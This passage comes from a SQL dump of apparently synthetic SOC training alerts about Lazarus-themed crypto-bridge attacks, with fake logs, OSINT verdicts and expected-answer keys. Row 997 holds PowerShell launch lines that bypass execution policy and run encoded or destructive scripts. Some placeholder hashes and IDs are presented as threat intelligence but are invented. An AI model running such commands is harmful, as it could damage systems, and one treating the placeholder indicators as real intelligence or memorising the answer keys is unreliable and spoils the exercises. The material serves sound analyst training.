attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.688Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-16T08:45:12Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.5\\\",\\\"user\\\":\\\"admin_user\\\",\\\"event\\\":\\\"multi-sig_wallet_access_attempt\\\",\\\"details\\\":{\\\"description\\\":\\\"Unauthorized access attempt detected\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"wallet_access_tool.exe\\\",\\\"signature\\\":\\\"Lazarus Group\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(997, 'Destructive Malware Deployment', 'high', 'Endpoint detection and response (EDR) logs', 'An attempt to deploy destructive malware was detected on the network. The malware aims to disrupt bridge operations and mask illicit activities by echoing the signature tactics of the Lazarus Group.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"execution\",\"event_id\":\"12345\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Temp\\\\destructo.ps1\",\"file_name\":\"destructo.ps1\",\"file_hash\":\"7c6a180b36896a0a8c02787eeafb0e4c\",\"process_id\":6789,\"parent_process\":\"explorer.exe\",\"parent_process_id\":4567}', '2026-01-17 03:44:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to the corporate network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Lazarus Group activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7c6a180b36896a0a8c02787eeafb0e4c\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known destructive malware used by the Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"destructo.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"suspicious\",\"details\":\"File name associated with unusual PowerShell activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(998, 'Cryptocurrency Laundering Infrastructure Detected', 'high', 'Cryptocurrency transaction analysis', 'Stolen funds are being processed through a complex laundering network involving mixers and exchanges. The operation is linked to the Lazarus Group, known for their advanced financial theft techniques.', 'Exfiltration', 'T1537 - Transfer Data to a Different Medium', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:20:35Z\",\"transaction_id\":\"tx1234567890abcdef\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\",\"mixer_address\":\"1MixerXYZ123456789abcdef\",\"exchange_domain\":\"cryptomixexchange.com\",\"user\":\"john.doe@example.com\",\"amount\":\"10 BTC\",\"malicious\":true}', '2026-01-17 03:44:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group IP associated with cryptocurrency laundering.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash of the malware used in the laundering operation.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"cryptomixexchange.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Domain associated with suspicious cryptocurrency exchange activity.\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"john.doe@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Email address of the implicated user in the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(999, 'Suspicious Smart Contract Interaction Detected', 'medium', 'Blockchain transaction logs', 'Anomalous interactions with the Wormhole bridge smart contract were detected, suggesting a potential exploitation of a signature verification vulnerability.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"transaction_id\":\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\",\"contract_address\":\"0xwormholebridge1234567890abcdef\",\"attacker_ip\":\"203.0.113.45\",\"source_ip\":\"192.168.1.100\",\"transaction_hash\":\"0xdeadbeef1234567890abcdef1234567890abcdef\",\"timestamp\":\"2023-10-01T12:34:56Z\",\"user\":\"0xvictimuser1234567890abcdef\",\"function_called\":\"verifySignature\",\"parameters\":{\"signature\":\"0xsuspicioussignature1234567890abcdef\",\"message\":\"0xmessagepayload1234567890abcdef\"}}', '2026-01-17 03:45:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous blockchain-related attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"0xdeadbeef1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"Blockchain Analysis\",\"verdict\":\"suspicious\",\"details\":\"Transaction hash associated with unusual smart contract interactions.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"0xvictimuser1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"Blockchain Explorer\",\"verdict\":\"internal\",\"details\":\"User account of interest.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1000, 'Exploitation of Signature Verification Vulnerability', 'high', 'Smart contract audit reports', 'An attacker successfully manipulated the smart contract by leveraging a signature verification vulnerability. This allowed unauthorized execution of transactions, moving large sums across the blockchain bridge.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event\":\"Unauthorized Transaction Execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"transaction_id\":\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\",\"affected_contract\":\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\",\"signature_method\":\"ECDSA\",\"vulnerability\":\"Improper Signature Validation\",\"malicious_file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"attacker123\"}', '2026-01-17 03:45:24', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous blockchain attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Asset\",\"verdict\":\"internal\",\"details\":\"Internal blockchain node handling transactions.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to tools used in blockchain exploitation.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"attacker123\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Logs\",\"verdict\":\"suspicious\",\"details\":\"Username linked with unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1001, 'Persistent Access via Compromised Keys', 'high', 'Cryptographic key monitoring tools', 'An attacker has maintained access to an exploited smart contract by using compromised cryptographic keys, leading to repeated unauthorized transactions.', 'Persistence', 'T1098 - Account Manipulation', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T02:15:30Z\",\"event_id\":\"crypto-access-00123\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"compromised_key_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"attacker_username\":\"attacker_user\",\"exploited_smart_contract\":\"0x9e564e1d1e334e123456790bcd1234567890abcd\",\"malicious_file\":\"malicious_keyfile.bin\",\"transaction_id\":\"tx1234567890abcdef\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-17 03:45:24', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with known crypto-related attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Hash matches known compromised cryptographic keys.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_keyfile.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"FileReputationService\",\"verdict\":\"malicious\",\"details\":\"File used to maintain unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"UserBehaviorAnalytics\",\"verdict\":\"suspicious\",\"details\":\"Username associated with unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 